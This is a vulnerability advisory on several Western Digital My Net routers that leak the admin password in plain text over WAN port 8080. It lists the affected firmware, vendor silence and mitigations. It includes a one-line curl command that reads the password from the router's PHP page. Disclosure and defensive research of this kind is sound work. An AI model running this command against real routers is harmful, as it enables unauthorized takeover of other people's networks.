Vulnerable Products - WD My Net N600 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N750 HD Dual Band Router Wireless N WiFi Router Accelerate HD Linux 2.6.3 Kernel Firmware Ver. 1.03.xx 1.04.xx Firmware unaffected Ver 1.01.xx WD My Net N900 HD Dual Band Router Wireless N WiFi Router Accelerate HD WD My Net N900 Central HD Dual Band Router 2TB Storage WiFi Wireless Router Firmware Ver. 1.05.xx 1.06.xx Version 1.07.16 released on 05/2013 does not have this bug Firmware unaffected Ver. 1.01.xx 1.02.xx 1.03.xx -------------------------------------------------------------------------------------------------------------- Vulnerabilities - On the WD My Net N600, N750, N900 and N900C routers, administrative credentials are stored in plain text and are easily accessible from a remote location via port 8080 on the WAN side of the router. On those routers affected by the bug, the following command will display the password value that openly resides in their php source code: curl -s http://<IP>:8080/main_internet.php? -L | egrep -i 'var pass' During initial setup, the page "main_internet.php" will store in plain text the admin password as a value of "var pass". Port 8080 is shared by both the UPnP modules and WAN side HTTP web services which remote administrative access is set to by default. The inherent difficulty with writing code to fit the unique requirements for authentication based tasks (administrative) on the same port as services that are privileged (UPnP), is quite apparent in the complexity with which each service is called on these units. Indeed, several of the developers comments inside the code, as well as warnings to the end user on the admin GUIs are made concerning this conflict and the risks involved. For example, in one line commented out speaking on an api function they state: /* 80, 443 ports can not use*//api/1.0/rest/device?owner=admin&pw=&name=" + hostname + "&rest_method=PUT"; Again, under code to start certain features that call UPnP services, it warns the end user: "Conflict with Remote Management service HTTP port"+": "+XG(XMLrm+"/web")+". "+"This may cause unpredictable problem. Are you sure you want to override?" In fact, when a call is made to change the password for the admin user, or to authenticate a remote administrative user access, a php or cgi action will call one of several modules services built into UPnP, in this case DEVICE.ACCOUNT. Ex: - Changing the password for admin will issue the following series of commands: /tools_admin.php --> /getcfg.php (SERVICES=DEVICE.ACCOUNT%2CHTTP.WAN-1%2CALERTMSG)--> hedwig.cgi (which posts the privlidged <postxml> module for <service>DEVICE.ACCOUNT</service>) --> /pigwidgeon.cgi (ACTIONS=SETCFG%2CSAVE%2CACTIVATE) --> /getcfg.php(sets the new cookie value, and finalizes the action) Conditions - UPnP and remote administrative access must be enabled for the bug to be activated. ------------------------------------------------------------------------------------------------------------------- Vendor Timeline- Western Digital has not returned any inquires that have been made regarding the bug. Patches of Fixes- On WD My Net N900 and N900C It is advised that users upgrade to Firmware Version 1.07.16. On WD My Net N600 and N750 If a restoration to Ver. 1.01.xx firmware is available, and remote access via the internet is a required feature, it is advised to contact vendor support for how best to proceed. Mitigation and Workarounds for those who aren't able to upgrade to downgrade firmware - Turn off all remote administrative access to the router Disable UPnP services Change the default username and password -------------------------------------------------------------------------------------------------------------------- Note: Critical vulnerabilities discovered on UPnP enable routers and other devices, that have visibility and access to the WAN, have continued to rise at a very rapid pace over the past year. During Defcon 19 Daniel Garcia gave a talk about UPnP Port mapping, the risks involved with the unpredictable nature of UPnP stacks and the danger that NAT traversal could be a possible outcome. http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf Back in January of this year, the security researcher at Rapid7, HDMoore had written a white paper on UPnP vulnerabilities, warning that "around 40-50 million network-enabled devices are at risk" which he explains includes "devices such as routers, printers, network-attached storage (NAS), media players and smart TVs." https://community.rapid7.com/docs/DOC-2150 In each of the devices he mentions, we have seen some exploitable vulnerabilities begin to surface, and even in some devices not mentioned yet such as DVRs and IP Web Cameras. A few vendors have been able to sufficiently mitigate the risks of UPnP/DLNA services co-existing with their products supporting remote access capabilities, however, many have not. The growing list of home router or modem models that are still vulnerable to a known bug, or have had to issue emergency patches to fix a vulnerability post production, has risen to alarmingly high numbers. End users should be urged to check with both their vendor and then with one of the various vulnerability databases, such as OSVDB who seem to have a very thorough listing, to see if their model is one of those currently known to be affected. Discovered - 07-02-2013 Research Contact - K Lovett Affiliation - SUSnet
